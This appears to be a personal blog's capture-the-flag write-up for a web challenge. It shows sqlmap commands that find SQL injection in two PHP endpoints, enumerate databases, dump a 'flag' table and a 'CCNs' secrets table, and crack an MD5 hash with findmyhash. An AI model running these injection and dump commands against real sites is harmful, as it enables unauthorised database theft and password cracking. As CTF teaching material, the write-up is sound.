Yes, that is gramatically correct. Now who doesn’t love a good book and an even better villain? https://ctf.rc3.club:2010/ With Love, Joker xx If you go to the site, you will…

Yes, that is gramatically correct. Now who doesn’t love a good book and an even better villain?

https://ctf.rc3.club:2010/

With Love,

Joker xx

If you go to the site, you will see there are two places to make queries.

websql

We are going to check for some SQL Injection possibilities.  First let’s try putting something into each box

primary

secondary

You can see the parameters being used.

I’m going to be lazy and use SQLMap.  If you’re trying to learn more about SQL Injection and how SQL works, it’s best to do this manually.  But I used SQLMap because I was trying to get through as many challenges as possible.

Let’s use SQLMap to see if they are vulnerable to SQL Injection.

sqlmap -u “https://ctf.rc3.club:2010/connect.php?primary=1

primaryisvuln

sqlmap -u “https://ctf.rc3.club:2010/connect2.php?secondary=1

secondaryisvuln

They are both vulnerable to SQL Injection.

Let’s discover databases:

sqlmap -u “https://ctf.rc3.club:2010/connect.php?primary=1” –dbs

finddatabasesprimary

sqlmap -u “https://ctf.rc3.club:2010/connect2.php?secondary=1”  -dbs

finddatabasesecondary

sqlmap -u “https://ctf.rc3.club:2010/connect.php?primary=1” –tables -D flag

We then see a table welcome.

sqlmap -u “https://ctf.rc3.club:2010/connect.php?primary=1” –dump -D flag -T welcome

pcbfcppgle

Pcbfcppgle – This turns out to not be the flag.  Then I decided to try to decipher it since the challenge said it wouldn’t be in plaintext.  Seems like a simple Caesar cipher.

redherring

Redherring still wasn’t the answer though.

Well, it seems we were bamboozled.  Let’s keep looking.  To save you the time of me going through each database, I’ll say that it was the CCNs.

sqlmap -u “https://ctf.rc3.club:2010/connect.php?primary=1” –tables -D CCNs

This gets you a table secrets

sqlmap -u “https://ctf.rc3.club:2010/connect.php?primary=1” –dump -D CCNs -T secrets

dumpsecrets

Then we’ll take the Joker’s hash and put it through findmyhash

findmyhash MD5 -h “c417fccfc5d5a288243c96359c62c381”

flag2

And there were go.

Ashton-Drake, aka GameOfPWNZ, is an information security professional and enthusiast He is the owner of this blog.

Leave a Reply